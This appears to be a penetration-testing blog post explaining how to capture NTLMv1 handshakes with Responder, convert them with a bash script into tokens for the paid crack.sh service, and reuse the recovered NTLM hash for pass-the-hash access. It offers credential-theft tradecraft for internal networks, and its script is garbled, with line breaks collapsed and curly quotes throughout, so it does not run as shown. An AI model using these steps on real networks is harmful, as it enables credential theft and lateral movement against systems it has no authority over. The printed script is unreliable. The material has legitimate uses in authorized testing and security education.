August 15, 2020

Cracking NTLMv1 Handshakes with Crack.sh

By Skylor Phillips

Read on if you’d like to learn how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.

Running Responder.py is one of the first tasks performed by most pentesters on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. Usually the next step is to attempt to crack those handshakes, at a minimum running them against a wordlist such as crackstation.

A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. The NTLM hash can be used as a password equivalent in a windows environment, unlike the NTLMv1 handshake.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS (https://www.youtube.com/watch?v=sIidzPntdCM).

NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).

How do we exploit this?

Use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for $20. You need to convert it to a token, rather than display in Responder directly because the site doesn’t take the challenge/response.

Use the script below to convert the Responder output to a token that will be accepted by crack.sh.

#!/bin/bash 

if [ $# -lt 1 ]

then   
echo
“Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> …”   
exit 1
fi for i in $@; dofor hash in $( cat $i )do    user=$(echo $hash | cut -f1 -d:)    domain=$(echo $hash | cut -f3 -d:)    lmresp=$(echo $hash | cut -f4 -d:)    ntresp=$(echo $hash | cut -f5 -d:)    srvchallenge=$(echo $hash | cut -f6 -d:)       # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html    if [ ${lmresp:16:32} ==  “00000000000000000000000000000000” ]    then               clientchallenge=${lmresp:0:16}        combinedchallenge=$srvchallenge$clientchallenge         srvchallenge=$( echo $combinedchallenge | xxd -r -p| md5sum -b | cut -c1-16)    fi      echo     echo “user:$user”     echo “domain:$domain”     echo “lmresponse:$lmresp”     echo “ntresp:$ntresp”     echo “challenge:$srvchallenge”        chapcrack=$(locate chapcrack.py | head -1)     if [ -e “$chapcrack” ]     then         $chapcrack radius -R $ntresp -C $srvchallenge     else        echo “chapcrack.py radius -R $ntresp -C $srvchallenge”    fidonedone

Upload this token to crack.sh, give them 20 dollars, and wait for your NTLM hash.

Another Hash?

Yes, NTLM hashes are password equivalents in a Windows environment. To leverage your newly acquired NTLM hash, use a tool like wmi-pth.